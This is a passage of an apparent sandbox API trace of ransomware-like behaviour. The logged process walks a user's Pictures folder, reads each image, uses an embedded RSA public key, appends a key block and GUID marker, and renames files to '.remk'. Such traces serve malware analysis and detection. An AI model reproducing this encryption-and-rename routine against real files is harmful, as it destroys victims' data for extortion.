hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ce9e8 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.327] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0xc991, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0xc991, lpOverlapped=0x0) returned 1 [0236.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.327] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc996, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.327] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.328] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.328] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.328] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.328] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.328] CloseHandle (hObject=0x640) returned 1 [0236.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0236.330] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0236.330] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\NfB4BN1dcg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\nfb4bn1dcg.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\NfB4BN1dcg.bmp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\nfb4bn1dcg.bmp.remk")) returned 1 [0236.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.332] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.334] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x410763b0, ftCreationTime.dwHighDateTime=0x1d5e79e, ftLastAccessTime.dwLowDateTime=0x8cbff2f0, ftLastAccessTime.dwHighDateTime=0x1d5dd11, ftLastWriteTime.dwLowDateTime=0x8cbff2f0, ftLastWriteTime.dwHighDateTime=0x1d5dd11, nFileSizeHigh=0x0, nFileSizeLow=0x132ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UzP92EkXV9tzwch.png", cAlternateFileName="UZP92E~1.PNG")) returned 1 [0236.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0236.334] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\UzP92EkXV9tzwch.png") returned=".png" [0236.334] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\UzP92EkXV9tzwch.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\uzp92ekxv9tzwch.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.335] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=78522) returned 1 [0236.335] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.340] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13294, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.340] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.342] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.342] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x132ba, lpOverlapped=0x0) returned 1 [0236.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.344] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.344] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.344] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.349] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.349] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.349] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.349] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.349] GetLastError () returned 0x0 [0236.349] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.349] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.349] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.350] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.350] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x132c0) returned 0x37cf820 [0236.350] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ce9e8 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cea30 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6c0 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6f0 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc750 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc708 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.351] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc708 | out: hHeap=0x630000) returned 1 [0236.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc750 | out: hHeap=0x630000) returned 1 [0236.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc750 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc708 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc6f0 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc708 | out: hHeap=0x630000) returned 1 [0236.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6f0 | out: hHeap=0x630000) returned 1 [0236.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc750 | out: hHeap=0x630000) returned 1 [0236.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.353] GetCurrentThreadId () returned 0x314 [0236.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c57f0 [0236.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.353] GetCurrentThreadId () returned 0x314 [0236.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.354] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.354] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.354] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.355] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x132ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.355] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.355] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.355] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.355] CloseHandle (hObject=0x640) returned 1 [0236.357] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.357] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e0) returned 0x37bd408 [0236.357] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\UzP92EkXV9tzwch.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\uzp92ekxv9tzwch.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\UzP92EkXV9tzwch.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\uzp92ekxv9tzwch.png.remk")) returned 1 [0236.359] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5ba6180, ftCreationTime.dwHighDateTime=0x1d5e7e5, ftLastAccessTime.dwLowDateTime=0x2ab2c670, ftLastAccessTime.dwHighDateTime=0x1d5e2cd, ftLastWriteTime.dwLowDateTime=0x2ab2c670, ftLastWriteTime.dwHighDateTime=0x1d5e2cd, nFileSizeHigh=0x0, nFileSizeLow=0x3daa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WJGbtDRaJ_I.gif", cAlternateFileName="WJGBTD~1.GIF")) returned 1 [0236.360] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.360] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.360] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\WJGbtDRaJ_I.gif") returned=".gif" [0236.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\2kWa8l\\WJGbtDRaJ_I.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\2kwa8l\\wjgbtdraj_i.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.360] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=15786) returned 1 [0236.360] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.363] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x3d84, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.363] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.365] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x3daa, lpOverlapped=0x0) returned 1 [0236.366] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.367] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.367] lstrlenA (lpString="-----BEGIN PUBLIC 